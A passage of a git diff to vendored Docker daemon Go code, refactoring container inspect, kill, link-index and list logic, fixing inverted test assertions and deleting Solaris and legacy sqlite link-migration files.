idtools.MkdirAllAndChownNew(filepath.Join(initLayer, pth), 0755, rootIDs); err != nil { return err } case "file": @@ -51,7 +55,7 @@ func Setup(initLayer string, rootUID, rootGID int) error { if err != nil { return err } - f.Chown(rootUID, rootGID) + f.Chown(rootIDs.UID, rootIDs.GID) f.Close() default: if err := os.Symlink(typ, filepath.Join(initLayer, pth)); err != nil { diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go index 48a9d71aa5..1032092e62 100644 --- a/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go +++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go @@ -1,6 +1,9 @@ -// +build windows +package initlayer // import "github.com/docker/docker/daemon/initlayer" -package initlayer +import ( + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" +) // Setup populates a directory with mountpoints suitable // for bind-mounting dockerinit into the container. The mountpoint is simply an @@ -8,6 +11,6 @@ package initlayer // // This extra layer is used by all containers as the top-most ro layer. It protects // the container from unwanted side-effects on the rw layer. 
-func Setup(initLayer string, rootUID, rootGID int) error { +func Setup(initLayer containerfs.ContainerFS, rootIDs idtools.IDPair) error { return nil } diff --git a/vendor/github.com/docker/docker/daemon/inspect.go b/vendor/github.com/docker/docker/daemon/inspect.go index 557f639de1..45a2154254 100644 --- a/vendor/github.com/docker/docker/daemon/inspect.go +++ b/vendor/github.com/docker/docker/daemon/inspect.go @@ -1,6 +1,7 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "errors" "fmt" "time" @@ -11,6 +12,8 @@ import ( "github.com/docker/docker/api/types/versions/v1p20" "github.com/docker/docker/container" "github.com/docker/docker/daemon/network" + "github.com/docker/docker/errdefs" + "github.com/docker/go-connections/nat" ) // ContainerInspect returns low-level information about a @@ -35,21 +38,22 @@ func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.Co } container.Lock() - defer container.Unlock() - base, err := daemon.getInspectData(container, size) + base, err := daemon.getInspectData(container) if err != nil { + container.Unlock() return nil, err } apiNetworks := make(map[string]*networktypes.EndpointSettings) for name, epConf := range container.NetworkSettings.Networks { if epConf.EndpointSettings != nil { - apiNetworks[name] = epConf.EndpointSettings + // We must make a copy of this pointer object otherwise it can race with other operations + apiNetworks[name] = epConf.EndpointSettings.Copy() } } - mountPoints := addMountPoints(container) + mountPoints := container.GetMountPoints() networkSettings := &types.NetworkSettings{ NetworkSettingsBase: types.NetworkSettingsBase{ Bridge: container.NetworkSettings.Bridge, @@ -57,7 +61,6 @@ func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.Co HairpinMode: container.NetworkSettings.HairpinMode, LinkLocalIPv6Address: container.NetworkSettings.LinkLocalIPv6Address, LinkLocalIPv6PrefixLen: 
container.NetworkSettings.LinkLocalIPv6PrefixLen, - Ports: container.NetworkSettings.Ports, SandboxKey: container.NetworkSettings.SandboxKey, SecondaryIPAddresses: container.NetworkSettings.SecondaryIPAddresses, SecondaryIPv6Addresses: container.NetworkSettings.SecondaryIPv6Addresses, @@ -66,6 +69,20 @@ func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.Co Networks: apiNetworks, } + ports := make(nat.PortMap, len(container.NetworkSettings.Ports)) + for k, pm := range container.NetworkSettings.Ports { + ports[k] = pm + } + networkSettings.NetworkSettingsBase.Ports = ports + + container.Unlock() + + if size { + sizeRw, sizeRootFs := daemon.imageService.GetContainerLayerSize(base.ID) + base.SizeRw = &sizeRw + base.SizeRootFs = &sizeRootFs + } + return &types.ContainerJSON{ ContainerJSONBase: base, Mounts: mountPoints, @@ -84,12 +101,12 @@ func (daemon *Daemon) containerInspect120(name string) (*v1p20.ContainerJSON, er container.Lock() defer container.Unlock() - base, err := daemon.getInspectData(container, false) + base, err := daemon.getInspectData(container) if err != nil { return nil, err } - mountPoints := addMountPoints(container) + mountPoints := container.GetMountPoints() config := &v1p20.ContainerConfig{ Config: container.Config, MacAddress: container.Config.MacAddress, @@ -107,7 +124,7 @@ func (daemon *Daemon) containerInspect120(name string) (*v1p20.ContainerJSON, er }, nil } -func (daemon *Daemon) getInspectData(container *container.Container, size bool) (*types.ContainerJSONBase, error) { +func (daemon *Daemon) getInspectData(container *container.Container) (*types.ContainerJSONBase, error) { // make a copy to play with hostConfig := *container.HostConfig @@ -123,7 +140,7 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool) var containerHealth *types.Health if container.State.Health != nil { containerHealth = &types.Health{ - Status: container.State.Health.Status, + Status: 
container.State.Health.Status(), FailingStreak: container.State.Health.FailingStreak, Log: append([]*types.HealthcheckResult{}, container.State.Health.Log...), } @@ -138,7 +155,7 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool) Dead: container.State.Dead, Pid: container.State.Pid, ExitCode: container.State.ExitCode(), - Error: container.State.Error(), + Error: container.State.ErrorMsg, StartedAt: container.State.StartedAt.Format(time.RFC3339Nano), FinishedAt: container.State.FinishedAt.Format(time.RFC3339Nano), Health: containerHealth, @@ -155,35 +172,36 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool) Name: container.Name, RestartCount: container.RestartCount, Driver: container.Driver, + Platform: container.OS, MountLabel: container.MountLabel, ProcessLabel: container.ProcessLabel, ExecIDs: container.GetExecIDs(), HostConfig: &hostConfig, } - var ( - sizeRw int64 - sizeRootFs int64 - ) - if size { - sizeRw, sizeRootFs = daemon.getSize(container) - contJSONBase.SizeRw = &sizeRw - contJSONBase.SizeRootFs = &sizeRootFs - } - // Now set any platform-specific fields contJSONBase = setPlatformSpecificContainerFields(container, contJSONBase) contJSONBase.GraphDriver.Name = container.Driver + if container.RWLayer == nil { + if container.Dead { + return contJSONBase, nil + } + return nil, errdefs.System(errors.New("RWLayer of container " + container.ID + " is unexpectedly nil")) + } + graphDriverData, err := container.RWLayer.Metadata() // If container is marked as Dead, the container's graphdriver metadata // could have been removed, it will cause error if we try to get the metadata, // we can ignore the error if the container is dead. 
- if err != nil && !container.Dead { - return nil, err + if err != nil { + if !container.Dead { + return nil, errdefs.System(err) + } + } else { + contJSONBase.GraphDriver.Data = graphDriverData } - contJSONBase.GraphDriver.Data = graphDriverData return contJSONBase, nil } @@ -191,9 +209,13 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool) // ContainerExecInspect returns low-level information about the exec // command. An error is returned if the exec cannot be found. func (daemon *Daemon) ContainerExecInspect(id string) (*backend.ExecInspect, error) { - e, err := daemon.getExecConfig(id) - if err != nil { - return nil, err + e := daemon.execCommands.Get(id) + if e == nil { + return nil, errExecNotFound(id) + } + + if container := daemon.containers.Get(e.ContainerID); container == nil { + return nil, errExecNotFound(id) } pc := inspectExecProcessConfig(e) @@ -213,19 +235,6 @@ func (daemon *Daemon) ContainerExecInspect(id string) (*backend.ExecInspect, err }, nil } -// VolumeInspect looks up a volume by name. An error is returned if -// the volume cannot be found. 
-func (daemon *Daemon) VolumeInspect(name string) (*types.Volume, error) { - v, err := daemon.volumes.Get(name) - if err != nil { - return nil, err - } - apiV := volumeToAPIType(v) - apiV.Mountpoint = v.Path() - apiV.Status = v.Status() - return apiV, nil -} - func (daemon *Daemon) getBackwardsCompatibleNetworkSettings(settings *network.Settings) *v1p20.NetworkSettings { result := &v1p20.NetworkSettings{ NetworkSettingsBase: types.NetworkSettingsBase{ diff --git a/vendor/github.com/docker/docker/daemon/inspect_unix.go b/vendor/github.com/docker/docker/daemon/inspect_linux.go similarity index 78% rename from vendor/github.com/docker/docker/daemon/inspect_unix.go rename to vendor/github.com/docker/docker/daemon/inspect_linux.go index 08a82235ad..77a4c44d79 100644 --- a/vendor/github.com/docker/docker/daemon/inspect_unix.go +++ b/vendor/github.com/docker/docker/daemon/inspect_linux.go @@ -1,6 +1,4 @@ -// +build !windows,!solaris - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/api/types" @@ -30,7 +28,7 @@ func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, container.Lock() defer container.Unlock() - base, err := daemon.getInspectData(container, false) + base, err := daemon.getInspectData(container) if err != nil { return nil, err } @@ -64,23 +62,6 @@ func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, }, nil } -func addMountPoints(container *container.Container) []types.MountPoint { - mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) - for _, m := range container.MountPoints { - mountPoints = append(mountPoints, types.MountPoint{ - Type: m.Type, - Name: m.Name, - Source: m.Path(), - Destination: m.Destination, - Driver: m.Driver, - Mode: m.Mode, - RW: m.RW, - Propagation: m.Propagation, - }) - } - return mountPoints -} - func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig { return 
&backend.ExecProcessConfig{ Tty: e.Tty, diff --git a/vendor/github.com/docker/docker/daemon/inspect_solaris.go b/vendor/github.com/docker/docker/daemon/inspect_solaris.go deleted file mode 100644 index 0e3dcc1119..0000000000 --- a/vendor/github.com/docker/docker/daemon/inspect_solaris.go +++ /dev/null @@ -1,41 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/backend" - "github.com/docker/docker/api/types/versions/v1p19" - "github.com/docker/docker/container" - "github.com/docker/docker/daemon/exec" -) - -// This sets platform-specific fields -func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase { - return contJSONBase -} - -// containerInspectPre120 get containers for pre 1.20 APIs. -func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, error) { - return &v1p19.ContainerJSON{}, nil -} - -func addMountPoints(container *container.Container) []types.MountPoint { - mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) - for _, m := range container.MountPoints { - mountPoints = append(mountPoints, types.MountPoint{ - Name: m.Name, - Source: m.Path(), - Destination: m.Destination, - Driver: m.Driver, - RW: m.RW, - }) - } - return mountPoints -} - -func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig { - return &backend.ExecProcessConfig{ - Tty: e.Tty, - Entrypoint: e.Entrypoint, - Arguments: e.Args, - } -} diff --git a/vendor/github.com/docker/docker/daemon/inspect_test.go b/vendor/github.com/docker/docker/daemon/inspect_test.go new file mode 100644 index 0000000000..f402a7af99 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/inspect_test.go @@ -0,0 +1,33 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + 
"github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/exec" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestGetInspectData(t *testing.T) { + c := &container.Container{ + ID: "inspect-me", + HostConfig: &containertypes.HostConfig{}, + State: container.NewState(), + ExecCommands: exec.NewStore(), + } + + d := &Daemon{ + linkIndex: newLinkIndex(), + configStore: &config.Config{}, + } + + _, err := d.getInspectData(c) + assert.Check(t, is.ErrorContains(err, "")) + + c.Dead = true + _, err = d.getInspectData(c) + assert.Check(t, err) +} diff --git a/vendor/github.com/docker/docker/daemon/inspect_windows.go b/vendor/github.com/docker/docker/daemon/inspect_windows.go index b331c83ca3..12fda670df 100644 --- a/vendor/github.com/docker/docker/daemon/inspect_windows.go +++ b/vendor/github.com/docker/docker/daemon/inspect_windows.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/api/types" @@ -12,21 +12,6 @@ func setPlatformSpecificContainerFields(container *container.Container, contJSON return contJSONBase } -func addMountPoints(container *container.Container) []types.MountPoint { - mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) - for _, m := range container.MountPoints { - mountPoints = append(mountPoints, types.MountPoint{ - Type: m.Type, - Name: m.Name, - Source: m.Path(), - Destination: m.Destination, - Driver: m.Driver, - RW: m.RW, - }) - } - return mountPoints -} - // containerInspectPre120 get containers for pre 1.20 APIs. 
func (daemon *Daemon) containerInspectPre120(name string) (*types.ContainerJSON, error) { return daemon.ContainerInspectCurrent(name, false) diff --git a/vendor/github.com/docker/docker/daemon/keys.go b/vendor/github.com/docker/docker/daemon/keys.go index 055d488a5d..946eaaab1c 100644 --- a/vendor/github.com/docker/docker/daemon/keys.go +++ b/vendor/github.com/docker/docker/daemon/keys.go @@ -1,6 +1,6 @@ // +build linux -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" diff --git a/vendor/github.com/docker/docker/daemon/keys_unsupported.go b/vendor/github.com/docker/docker/daemon/keys_unsupported.go index b17255940a..2ccdb576d7 100644 --- a/vendor/github.com/docker/docker/daemon/keys_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/keys_unsupported.go @@ -1,8 +1,8 @@ // +build !linux -package daemon +package daemon // import "github.com/docker/docker/daemon" -// ModifyRootKeyLimit is an noop on unsupported platforms. +// ModifyRootKeyLimit is a noop on unsupported platforms. 
func ModifyRootKeyLimit() error { return nil } diff --git a/vendor/github.com/docker/docker/daemon/kill.go b/vendor/github.com/docker/docker/daemon/kill.go index 18d5bbb4e5..5034c4df39 100644 --- a/vendor/github.com/docker/docker/daemon/kill.go +++ b/vendor/github.com/docker/docker/daemon/kill.go @@ -1,15 +1,18 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "runtime" - "strings" "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/container" + containerpkg "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/libcontainerd" "github.com/docker/docker/pkg/signal" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) type errNoSuchProcess struct { @@ -21,6 +24,8 @@ func (e errNoSuchProcess) Error() string { return fmt.Sprintf("Cannot kill process (pid=%d) with signal %d: no such process.", e.pid, e.signal) } +func (errNoSuchProcess) NotFound() {} + // isErrNoSuchProcess returns true if the error // is an instance of errNoSuchProcess. func isErrNoSuchProcess(err error) bool { @@ -54,30 +59,30 @@ func (daemon *Daemon) ContainerKill(name string, sig uint64) error { // to send the signal. An error is returned if the container is paused // or not running, or if there is a problem returned from the // underlying kill command. -func (daemon *Daemon) killWithSignal(container *container.Container, sig int) error { +func (daemon *Daemon) killWithSignal(container *containerpkg.Container, sig int) error { logrus.Debugf("Sending kill signal %d to container %s", sig, container.ID) container.Lock() defer container.Unlock() - // We could unpause the container for them rather than returning this error - if container.Paused { - return fmt.Errorf("Container %s is paused. 
Unpause the container before stopping", container.ID) - } + daemon.stopHealthchecks(container) if !container.Running { - return errNotRunning{container.ID} + return errNotRunning(container.ID) } - if container.Config.StopSignal != "" { + var unpause bool + if container.Config.StopSignal != "" && syscall.Signal(sig) != syscall.SIGKILL { containerStopSignal, err := signal.ParseSignal(container.Config.StopSignal) if err != nil { return err } if containerStopSignal == syscall.Signal(sig) { container.ExitOnNext() + unpause = container.Paused } } else { container.ExitOnNext() + unpause = container.Paused } if !daemon.IsShuttingDown() { @@ -92,13 +97,18 @@ func (daemon *Daemon) killWithSignal(container *container.Container, sig int) er } if err := daemon.kill(container, sig); err != nil { - err = fmt.Errorf("Cannot kill container %s: %s", container.ID, err) - // if container or process not exists, ignore the error - if strings.Contains(err.Error(), "container not found") || - strings.Contains(err.Error(), "no such process") { - logrus.Warnf("container kill failed because of 'container not found' or 'no such process': %s", err.Error()) + if errdefs.IsNotFound(err) { + unpause = false + logrus.WithError(err).WithField("container", container.ID).WithField("action", "kill").Debug("container kill failed because of 'container not found' or 'no such process'") } else { - return err + return errors.Wrapf(err, "Cannot kill container %s", container.ID) + } + } + + if unpause { + // above kill signal will be sent once resume is finished + if err := daemon.containerd.Resume(context.Background(), container.ID); err != nil { + logrus.Warn("Cannot unpause container %s: %s", container.ID, err) } } @@ -110,16 +120,16 @@ func (daemon *Daemon) killWithSignal(container *container.Container, sig int) er } // Kill forcefully terminates a container. 
-func (daemon *Daemon) Kill(container *container.Container) error { +func (daemon *Daemon) Kill(container *containerpkg.Container) error { if !container.IsRunning() { - return errNotRunning{container.ID} + return errNotRunning(container.ID) } // 1. Send SIGKILL if err := daemon.killPossiblyDeadProcess(container, int(syscall.SIGKILL)); err != nil { // While normally we might "return err" here we're not going to // because if we can't stop the container by this point then - // its probably because its already stopped. Meaning, between + // it's probably because it's already stopped. Meaning, between // the time of the IsRunning() call above and now it stopped. // Also, since the err return will be environment specific we can't // look for any particular (common) error that would indicate @@ -131,7 +141,10 @@ func (daemon *Daemon) Kill(container *container.Container) error { return nil } - if _, err2 := container.WaitStop(2 * time.Second); err2 != nil { + ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second) + defer cancel() + + if status := <-container.Wait(ctx, containerpkg.WaitConditionNotRunning); status.Err() != nil { return err } } @@ -144,14 +157,17 @@ func (daemon *Daemon) Kill(container *container.Container) error { return err } - container.WaitStop(-1 * time.Second) + // Wait for exit with no timeout. + // Ignore returned status. + <-container.Wait(context.Background(), containerpkg.WaitConditionNotRunning) + return nil } // killPossibleDeadProcess is a wrapper around killSig() suppressing "no such process" error. 
-func (daemon *Daemon) killPossiblyDeadProcess(container *container.Container, sig int) error { +func (daemon *Daemon) killPossiblyDeadProcess(container *containerpkg.Container, sig int) error { err := daemon.killWithSignal(container, sig) - if err == syscall.ESRCH { + if errdefs.IsNotFound(err) { e := errNoSuchProcess{container.GetPID(), sig} logrus.Debug(e) return e @@ -159,6 +175,6 @@ func (daemon *Daemon) killPossiblyDeadProcess(container *container.Container, si return err } -func (daemon *Daemon) kill(c *container.Container, sig int) error { - return daemon.containerd.Signal(c.ID, sig) +func (daemon *Daemon) kill(c *containerpkg.Container, sig int) error { + return daemon.containerd.SignalProcess(context.Background(), c.ID, libcontainerd.InitProcessName, sig) } diff --git a/vendor/github.com/docker/docker/daemon/links.go b/vendor/github.com/docker/docker/daemon/links.go index 7f691d4f16..1639572fa8 100644 --- a/vendor/github.com/docker/docker/daemon/links.go +++ b/vendor/github.com/docker/docker/daemon/links.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "sync" @@ -76,12 +76,16 @@ func (l *linkIndex) parents(child *container.Container) map[string]*container.Co } // delete deletes all link relationships referencing this container -func (l *linkIndex) delete(container *container.Container) { +func (l *linkIndex) delete(container *container.Container) []string { l.mu.Lock() - for _, child := range l.idx[container] { + + var aliases []string + for alias, child := range l.idx[container] { + aliases = append(aliases, alias) delete(l.childIdx[child], container) } delete(l.idx, container) delete(l.childIdx, container) l.mu.Unlock() + return aliases } diff --git a/vendor/github.com/docker/docker/daemon/links/links.go b/vendor/github.com/docker/docker/daemon/links/links.go index af15de046d..2bcb483259 100644 --- a/vendor/github.com/docker/docker/daemon/links/links.go +++ 
b/vendor/github.com/docker/docker/daemon/links/links.go @@ -1,4 +1,4 @@ -package links +package links // import "github.com/docker/docker/daemon/links" import ( "fmt" diff --git a/vendor/github.com/docker/docker/daemon/links/links_test.go b/vendor/github.com/docker/docker/daemon/links/links_test.go index 0273f13cf0..e1b36dbbd9 100644 --- a/vendor/github.com/docker/docker/daemon/links/links_test.go +++ b/vendor/github.com/docker/docker/daemon/links/links_test.go @@ -1,4 +1,4 @@ -package links +package links // import "github.com/docker/docker/daemon/links" import ( "fmt" @@ -33,7 +33,7 @@ func TestLinkNaming(t *testing.T) { value, ok := env["DOCKER_1_PORT"] if !ok { - t.Fatalf("DOCKER_1_PORT not found in env") + t.Fatal("DOCKER_1_PORT not found in env") } if value != "tcp://172.0.17.2:6379" { @@ -192,21 +192,21 @@ func TestLinkPortRangeEnv(t *testing.T) { if env["DOCKER_ENV_PASSWORD"] != "gordon" { t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"]) } - for i := range []int{6379, 6380, 6381} { + for _, i := range []int{6379, 6380, 6381} { tcpaddr := fmt.Sprintf("DOCKER_PORT_%d_TCP_ADDR", i) - tcpport := fmt.Sprintf("DOCKER_PORT_%d_TCP+PORT", i) - tcpproto := fmt.Sprintf("DOCKER_PORT_%d_TCP+PROTO", i) + tcpport := fmt.Sprintf("DOCKER_PORT_%d_TCP_PORT", i) + tcpproto := fmt.Sprintf("DOCKER_PORT_%d_TCP_PROTO", i) tcp := fmt.Sprintf("DOCKER_PORT_%d_TCP", i) - if env[tcpaddr] == "172.0.17.2" { + if env[tcpaddr] != "172.0.17.2" { t.Fatalf("Expected env %s = 172.0.17.2, got %s", tcpaddr, env[tcpaddr]) } - if env[tcpport] == fmt.Sprintf("%d", i) { + if env[tcpport] != fmt.Sprintf("%d", i) { t.Fatalf("Expected env %s = %d, got %s", tcpport, i, env[tcpport]) } - if env[tcpproto] == "tcp" { + if env[tcpproto] != "tcp" { t.Fatalf("Expected env %s = tcp, got %s", tcpproto, env[tcpproto]) } - if env[tcp] == fmt.Sprintf("tcp://172.0.17.2:%d", i) { + if env[tcp] != fmt.Sprintf("tcp://172.0.17.2:%d", i) { t.Fatalf("Expected env %s = tcp://172.0.17.2:%d, got %s", tcp, i, 
env[tcp]) } } diff --git a/vendor/github.com/docker/docker/daemon/links_linux.go b/vendor/github.com/docker/docker/daemon/links_linux.go deleted file mode 100644 index 2ea40d9e51..0000000000 --- a/vendor/github.com/docker/docker/daemon/links_linux.go +++ /dev/null @@ -1,72 +0,0 @@ -package daemon - -import ( - "fmt" - "path/filepath" - "strings" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/container" - "github.com/docker/docker/pkg/graphdb" -) - -// migrateLegacySqliteLinks migrates sqlite links to use links from HostConfig -// when sqlite links were used, hostConfig.Links was set to nil -func (daemon *Daemon) migrateLegacySqliteLinks(db *graphdb.Database, container *container.Container) error { - // if links is populated (or an empty slice), then this isn't using sqlite links and can be skipped - if container.HostConfig == nil || container.HostConfig.Links != nil { - return nil - } - - logrus.Debugf("migrating legacy sqlite link info for container: %s", container.ID) - - fullName := container.Name - if fullName[0] != '/' { - fullName = "/" + fullName - } - - // don't use a nil slice, this ensures that the check above will skip once the migration has completed - links := []string{} - children, err := db.Children(fullName, 0) - if err != nil { - if !strings.Contains(err.Error(), "Cannot find child for") { - return err - } - // else continue... it's ok if we didn't find any children, it'll just be nil and we can continue the migration - } - - for _, child := range children { - c, err := daemon.GetContainer(child.Entity.ID()) - if err != nil { - return err - } - - links = append(links, c.Name+":"+child.Edge.Name) - } - - container.HostConfig.Links = links - return container.WriteHostConfig() -} - -// sqliteMigration performs the link graph DB migration. 
-func (daemon *Daemon) sqliteMigration(containers map[string]*container.Container) error { - // migrate any legacy links from sqlite - linkdbFile := filepath.Join(daemon.root, "linkgraph.db") - var ( - legacyLinkDB *graphdb.Database - err error - ) - - legacyLinkDB, err = graphdb.NewSqliteConn(linkdbFile) - if err != nil { - return fmt.Errorf("error connecting to legacy link graph DB %s, container links may be lost: %v", linkdbFile, err) - } - defer legacyLinkDB.Close() - - for _, c := range containers { - if err := daemon.migrateLegacySqliteLinks(legacyLinkDB, c); err != nil { - return err - } - } - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/links_linux_test.go b/vendor/github.com/docker/docker/daemon/links_linux_test.go deleted file mode 100644 index e2dbff2d25..0000000000 --- a/vendor/github.com/docker/docker/daemon/links_linux_test.go +++ /dev/null @@ -1,98 +0,0 @@ -package daemon - -import ( - "encoding/json" - "io/ioutil" - "os" - "path" - "path/filepath" - "testing" - - containertypes "github.com/docker/docker/api/types/container" - "github.com/docker/docker/container" - "github.com/docker/docker/pkg/graphdb" - "github.com/docker/docker/pkg/stringid" -) - -func TestMigrateLegacySqliteLinks(t *testing.T) { - tmpDir, err := ioutil.TempDir("", "legacy-qlite-links-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpDir) - - name1 := "test1" - c1 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: stringid.GenerateNonCryptoID(), - Name: name1, - HostConfig: &containertypes.HostConfig{}, - }, - } - c1.Root = tmpDir - - name2 := "test2" - c2 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: stringid.GenerateNonCryptoID(), - Name: name2, - }, - } - - store := container.NewMemoryStore() - store.Add(c1.ID, c1) - store.Add(c2.ID, c2) - - d := &Daemon{root: tmpDir, containers: store} - db, err := graphdb.NewSqliteConn(filepath.Join(d.root, "linkgraph.db")) - if err != nil { - 
t.Fatal(err) - } - - if _, err := db.Set("/"+name1, c1.ID); err != nil { - t.Fatal(err) - } - - if _, err := db.Set("/"+name2, c2.ID); err != nil { - t.Fatal(err) - } - - alias := "hello" - if _, err := db.Set(path.Join(c1.Name, alias), c2.ID); err != nil { - t.Fatal(err) - } - - if err := d.migrateLegacySqliteLinks(db, c1); err != nil { - t.Fatal(err) - } - - if len(c1.HostConfig.Links) != 1 { - t.Fatal("expected links to be populated but is empty") - } - - expected := name2 + ":" + alias - actual := c1.HostConfig.Links[0] - if actual != expected { - t.Fatalf("got wrong link value, expected: %q, got: %q", expected, actual) - } - - // ensure this is persisted - b, err := ioutil.ReadFile(filepath.Join(c1.Root, "hostconfig.json")) - if err != nil { - t.Fatal(err) - } - type hc struct { - Links []string - } - var cfg hc - if err := json.Unmarshal(b, &cfg); err != nil { - t.Fatal(err) - } - - if len(cfg.Links) != 1 { - t.Fatalf("expected one entry in links, got: %d", len(cfg.Links)) - } - if cfg.Links[0] != expected { // same expected as above - t.Fatalf("got wrong link value, expected: %q, got: %q", expected, cfg.Links[0]) - } -} diff --git a/vendor/github.com/docker/docker/daemon/links_notlinux.go b/vendor/github.com/docker/docker/daemon/links_notlinux.go deleted file mode 100644 index 12c226cfac..0000000000 --- a/vendor/github.com/docker/docker/daemon/links_notlinux.go +++ /dev/null @@ -1,10 +0,0 @@ -// +build !linux - -package daemon - -import "github.com/docker/docker/container" - -// sqliteMigration performs the link graph DB migration. 
No-op on platforms other than Linux -func (daemon *Daemon) sqliteMigration(_ map[string]*container.Container) error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/list.go b/vendor/github.com/docker/docker/daemon/list.go index 02805ea62b..750079f966 100644 --- a/vendor/github.com/docker/docker/daemon/list.go +++ b/vendor/github.com/docker/docker/daemon/list.go @@ -1,29 +1,22 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "errors" "fmt" "sort" "strconv" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - networktypes "github.com/docker/docker/api/types/network" "github.com/docker/docker/container" + "github.com/docker/docker/daemon/images" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" - "github.com/docker/docker/volume" "github.com/docker/go-connections/nat" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -var acceptedVolumeFilterTags = map[string]bool{ - "dangling": true, - "name": true, - "driver": true, - "label": true, -} - var acceptedPsFilterTags = map[string]bool{ "ancestor": true, "before": true, @@ -38,6 +31,8 @@ var acceptedPsFilterTags = map[string]bool{ "volume": true, "network": true, "is-task": true, + "publish": true, + "expose": true, } // iterationAction represents possible outcomes happening during the container iteration. @@ -45,7 +40,7 @@ type iterationAction int // containerReducer represents a reducer for a container. // Returns the object to serialize by the api. -type containerReducer func(*container.Container, *listContext) (*types.Container, error) +type containerReducer func(*container.Snapshot, *listContext) (*types.Container, error) const ( // includeContainer is the action to include a container in the reducer. 
@@ -81,33 +76,39 @@ type listContext struct { exitAllowed []int // beforeFilter is a filter to ignore containers that appear before the one given - beforeFilter *container.Container + beforeFilter *container.Snapshot // sinceFilter is a filter to stop the filtering when the iterator arrive to the given container - sinceFilter *container.Container + sinceFilter *container.Snapshot // taskFilter tells if we should filter based on wether a container is part of a task taskFilter bool // isTask tells us if the we should filter container that are a task (true) or not (false) isTask bool + + // publish is a list of published ports to filter with + publish map[nat.Port]bool + // expose is a list of exposed ports to filter with + expose map[nat.Port]bool + // ContainerListOptions is the filters set by the user *types.ContainerListOptions } -// byContainerCreated is a temporary type used to sort a list of containers by creation time. -type byContainerCreated []*container.Container +// byCreatedDescending is a temporary type used to sort a list of containers by creation time. +type byCreatedDescending []container.Snapshot -func (r byContainerCreated) Len() int { return len(r) } -func (r byContainerCreated) Swap(i, j int) { r[i], r[j] = r[j], r[i] } -func (r byContainerCreated) Less(i, j int) bool { - return r[i].Created.UnixNano() < r[j].Created.UnixNano() +func (r byCreatedDescending) Len() int { return len(r) } +func (r byCreatedDescending) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byCreatedDescending) Less(i, j int) bool { + return r[j].CreatedAt.UnixNano() < r[i].CreatedAt.UnixNano() } // Containers returns the list of containers to show given the user's filtering. 
func (daemon *Daemon) Containers(config *types.ContainerListOptions) ([]*types.Container, error) { - return daemon.reduceContainers(config, daemon.transformContainer) + return daemon.reduceContainers(config, daemon.refreshImage) } -func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Container { +func (daemon *Daemon) filterByNameIDMatches(view container.View, ctx *listContext) ([]container.Snapshot, error) { idSearch := false names := ctx.filters.Get("name") ids := ctx.filters.Get("id") @@ -115,7 +116,9 @@ func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Conta // if name or ID filters are not in use, return to // standard behavior of walking the entire container // list from the daemon's in-memory store - return daemon.List() + all, err := view.All() + sort.Sort(byCreatedDescending(all)) + return all, err } // idSearch will determine if we limit name matching to the IDs @@ -150,38 +153,52 @@ func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Conta } } - cntrs := make([]*container.Container, 0, len(matches)) + cntrs := make([]container.Snapshot, 0, len(matches)) for id := range matches { - if c := daemon.containers.Get(id); c != nil { - cntrs = append(cntrs, c) + c, err := view.Get(id) + switch err.(type) { + case nil: + cntrs = append(cntrs, *c) + case container.NoSuchContainerError: + // ignore error + default: + return nil, err } } // Restore sort-order after filtering // Created gives us 